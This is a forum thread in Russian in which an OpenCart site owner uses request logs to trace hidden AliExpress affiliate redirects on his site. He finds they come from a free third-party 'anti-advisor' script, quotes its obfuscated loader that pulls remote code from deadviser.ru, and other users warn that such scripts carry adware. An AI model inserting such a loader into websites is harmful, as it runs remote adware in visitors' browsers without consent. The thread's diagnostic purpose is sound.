Вирус? ALIEXPRESS

kolek5520 · 21 грудня 2017

Добрый день всем.
Гонял сайт через сервис http://www.webpagetest.org

и заметил, среди запросов, странные ведущие на ALIEXPRESS И com-sale.ru

Спойлер


+ Request 176: https://passport.alibaba.com/jump.htm?toURL=http%3A%2F%2Fs.click.aliexpress.com%2Fe%2FZJmQJiA
- Request 177: http://s.click.aliexpress.com/e/ZJmQJiA
URL: http://s.click.aliexpress.com/e/ZJmQJiA
Host: s.click.aliexpress.com
IP: 104.81.62.228
Error/Status Code: 302
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 42588
Request Start: 10.142 s
DNS Lookup: 30 ms
Initial Connection: 29 ms
Time to First Byte: 279 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB
Request Headers:

GET /e/ZJmQJiA HTTP/1.1
Host: s.click.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; xman_us_f=x_l=0&x_locale=ru_RU; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; acs_usuc_t=acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==
Response Headers:

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
P3P: CP="CAO PSA OUR"
X-Application-Context: affiliateclick:prod,production:7001
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Location: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Content-Language: en-US
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
Set-Cookie: xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
Set-Cookie: acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; Domain=.aliexpress.com; Path=/
Set-Cookie: aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
- Request 178: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
URL: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Host: ru.aliexpress.com
IP: 104.81.232.172
Error/Status Code: 301
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 48324
Request Start: 10.452 s
Time to First Byte: 212 ms
Bytes In (downloaded): 0.3 KB
Bytes Out (uploaded): 1.6 KB
Request Headers:

GET /af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5 HTTP/1.1
Host: ru.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; JSESSIONID=3Q2KZA0W-TJ3RYODNMH5ABTJ7KWCM1-NP35EGBJ-2H; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==; _mle_tmp0=eNrz4A12DQ729PeL9%2FV3cfUxiKjOTLFSMg408o5yNAjXDfEyDor0d%2FHz9TB1dArxMvcOd%2FY11PULMDZ1dXfy0jXyUNJJLrEyNDU0tjA1sTQ2NTA11ElMRhPIrbAyqI0CAP7gG7k%3D; xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA
Response Headers:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 286
Location: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
+ Request 179: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
+ Request 180: https://mc.yandex.ru/webvisor/25275842?wmode=0&rn=486342043&page-url=https%3A%2F%2F1mango.ru%2F&wv-type=2&wv-hit=585454435&wv-part=1&browser-info=ti%3A8%3Aet%3A1513854936%3Av%3A929%3Az%3A60%3Ai%3A20171221121534%3Ast%3A1513854937%3Au%3A1513854934737472983
+ Request 181: https://ru.aliexpress.com/af/category/202000020.html?sk=ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5&cpt=1513854936600&blanktest=0&origin=n&jump=afs&aff_platform=promotion&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&CatId=202000020&catName=consumer-electronics

Змінено 21 грудня 2017 користувачем kolek5520

Shureg · 21 грудня 2017

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

kolek5520 · 21 грудня 2017

5 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем.

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

markimax · 21 грудня 2017

15 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу.

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

Shureg · 21 грудня 2017

17 минут назад, kolek5520 сказал:

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем.

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Прошу прощения за подозрения, рад, что неправ.
Увы, слишком часто "секретность" именно "варезностью" обусловлена. У вас, к тому же, даже на картинке ссылки не найти, а была бы нелишней

kolek5520 · 21 грудня 2017

https://developers.google.com/speed/pagespeed/insights тоже ругается на какие то не сжатые картинки с https://ae01.alicdn.com

https://yadi.sk/i/mWeO4CUi3QphH8

В общем кто с этим знаком и может помочь, напишите в личку - не бесплатно конечно

kolek5520 · 21 грудня 2017

1 час назад, markimax сказал:

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/

<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим

markimax · 21 грудня 2017

1 час назад, kolek5520 сказал:
нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/
<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>
убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим

Как я и предполагал

Мудаки одним словом
Написано FREE
А на самом деле Adware

markimax · 21 грудня 2017

Ребята, не вставляйте разную "бесплатную" хрень откуда попало
99.9% туда или майнер скрытый засунут, adware или маркетинговую следилку
Относится это ко всему и к разным дискусам и т п

pimur · 21 грудня 2017

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

kolek5520 · 21 грудня 2017

36 минут назад, pimur сказал:

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

а как быть тогда с этим советником? как его убрать?

pimur · 21 грудня 2017

2 часа назад, kolek5520 сказал:

а как быть тогда с этим советником? как его убрать?

Уберите разметку с цены, подмена цены и т.д

Вхід

Вирус? ALIEXPRESS

Recommended Posts

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Створити обліковий запис

Вхід

Схожі публікації

Зараз на сторінці 0 користувачів

Покупцям

Розробникам

Корисна інформація

Останні розширення

Important Information